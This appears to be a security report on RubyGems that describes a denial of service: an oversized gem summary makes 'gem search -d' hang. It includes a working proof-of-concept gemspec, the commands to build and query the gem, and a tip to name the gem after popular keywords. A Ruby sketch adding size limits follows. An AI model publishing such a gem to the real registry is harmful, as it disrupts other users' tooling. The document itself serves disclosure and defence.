Currently, there is no limit on summary length. I think pushing a gem whose summary is huge will make
gem search unavailable.
This is not arbitrary code execution, but the attack is really easy to carry out. According to the CVSS v3.0 Calculator, the severity is High (7.5).
1) An attacker creates a gem with huge summary string, and push it to rubygems.org.
2) A victim runs `gem search -d <substring-of-the-name-of-the-gem>`, but it will give no response.
It may be good for the gem name to include a frequently-searched keyword, such as "foo-rails-bar" or "foo-sinatra-bar".
1) Prepare the following gemspec.
~~~~
Gem::Specification.new do |spec|
  spec.name = "huge-summary"
  spec.version = "0.0.1"
  spec.authors = ["Yusuke Endoh"]
  spec.email = ["email@example.com"]
  spec.summary = "foo" * 10000000
  spec.homepage = "http://example.com/"
  spec.license = "MIT"
end
~~~~
2) Run the following commands.
~~~~
gem build huge-summary.gemspec
gem install huge-summary-0.0.1.gem
~~~~
3) Run the following command.
~~~~
gem query huge-summary -d
~~~~
It will not answer.
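
A defensive sketch for the missing limit described above, added here as an example and not taken from the report or from RubyGems itself: it rejects oversized free-text fields when a gem is submitted and bounds the text before a client formats it. The limits, the helper names (`oversized_fields`, `display_text`, `sample_spec`) and the sample specs are assumptions constructed for illustration.

```ruby
require "rubygems"

# Hypothetical limits (assumptions, not values taken from RubyGems or rubygems.org).
MAX_FIELD_BYTES = { summary: 1_024, description: 64 * 1_024 }.freeze
MAX_DISPLAY_CHARS = 200

# Push-time check: return one message per free-text field that exceeds its limit.
def oversized_fields(spec, limits = MAX_FIELD_BYTES)
  limits.each_with_object([]) do |(field, max), errors|
    size = spec.public_send(field).to_s.bytesize
    errors << "#{field} is #{size} bytes (limit #{max})" if size > max
  end
end

# Display-time check: bound the text before any wrapping or formatting touches it,
# so an already-published oversized field cannot stall a client.
def display_text(text, max = MAX_DISPLAY_CHARS)
  text = text.to_s
  return text if text.length <= max

  "#{text[0, max]}... (truncated from #{text.length} characters)"
end

# Constructed sample specs; the second has the report's shape at a small scale.
def sample_spec(name, summary)
  Gem::Specification.new do |spec|
    spec.name = name
    spec.version = "0.0.1"
    spec.authors = ["Example Author"]
    spec.summary = summary
  end
end

NORMAL = sample_spec("normal-summary", "A short, ordinary summary")
OVERSIZED = sample_spec("oversized-summary", "foo" * 1_000)

if $PROGRAM_NAME == __FILE__
  [NORMAL, OVERSIZED].each do |spec|
    errors = oversized_fields(spec)
    status = errors.empty? ? "accepted" : "rejected: #{errors.join('; ')}"
    puts "#{spec.name}: #{status}"
    puts "  shown as: #{display_text(spec.summary)}"
  end
end
```

The two checks are complementary: the push-time check stops new oversized gems, while the display-time bound protects clients from gems that were published before a limit existed.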